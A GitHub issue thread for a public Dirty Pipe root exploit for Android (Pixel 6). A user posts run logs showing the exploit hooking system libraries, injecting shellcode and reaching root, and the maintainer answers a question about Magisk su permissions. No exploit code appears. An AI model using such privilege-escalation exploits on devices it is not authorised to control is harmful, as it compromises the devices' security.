search

polygraphene / DirtyPipe-Android

Dirty Pipe root exploit for Android (Pixel 6)
771 stars 130 forks source link

su permission denied #10

Open 0xceb1d opened 2 years ago

0xceb1d commented 2 years ago

Given this a few shots on a Pixel 6 device running SQ1D.220205.003 (8069835) Needed to set the -f flag, even though the build should technically be fine with the version check

0xceb1d@MacBook-Pro dirtypipe-android-1.0.3 % ./run.sh
dirtypipe-android: 1 file pushed, 0 skipped. 57.6 MB/s (45400 bytes in 0.001s)
env-patcher: 1 file pushed, 0 skipped. 42.6 MB/s (13224 bytes in 0.000s)
startup-root: 1 file pushed, 0 skipped. 34.2 MB/s (6899 bytes in 0.000s)
magisk/: 7 files pushed, 0 skipped. 34.2 MB/s (14522684 bytes in 0.405s)
10 files pushed, 0 skipped. 33.5 MB/s (14588207 bytes in 0.415s)
Unsupported version: Product=oriole Fingerprint=google/oriole/oriole:12/SQ1D.220205.003/8069835:user/release-keys

Full run logs

0xceb1d@MacBook-Pro dirtypipe-android-1.0.3 % ./run.sh
dirtypipe-android: 1 file pushed, 0 skipped. 61.7 MB/s (45400 bytes in 0.001s)
env-patcher: 1 file pushed, 0 skipped. 59.4 MB/s (13224 bytes in 0.000s)
startup-root: 1 file pushed, 0 skipped. 44.5 MB/s (6899 bytes in 0.000s)
magisk/: 7 files pushed, 0 skipped. 36.6 MB/s (14522684 bytes in 0.379s)
10 files pushed, 0 skipped. 35.9 MB/s (14588207 bytes in 0.387s)
Failed to set property 'a' to 'a'.
See dmesg for error reason.
Ignore device info.
Device version: Product=oriole Fingerprint=google/oriole/oriole:12/SQ1D.220205.003/8069835:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libstagefright_soft_mp3dec.so
Offset found: shellcode_offset: a2de0 hook_offset: 5a9dc first instruction: a9be7bfd
Empty space size: 544 bytes
Run index: 0
Stage1 debug filename: /dev/.dirtypipe-0000
Shell code size: 344 0x158 bytes
It worked!
0xceb1d@MacBook-Pro dirtypipe-android-1.0.3 % adb shell
oriole:/ $ cd /data/local/tmp
oriole:/data/local/tmp $ ls
dirtypipe-android  dirtypipe-run-index  env-patcher  magisk  mylog2  root-log1  startup-root
oriole:/data/local/tmp $ cat root-log1
Successfully access log. Try=2
Start startup-root
Thu May 26 21:44:48 BST 2022: uid=0(root) gid=0(root) groups=0(root),3009(readproc) context=u:r:magisk:s0
oriole:/data/local/tmp $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),1078(ext_data_rw),1079(ext_obb_rw),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
oriole:/data/local/tmp $ su
Permission denied
13|oriole:/data/local/tmp $
polygraphene commented 2 years ago

Did you configure magisk app to permit su access for adb shell?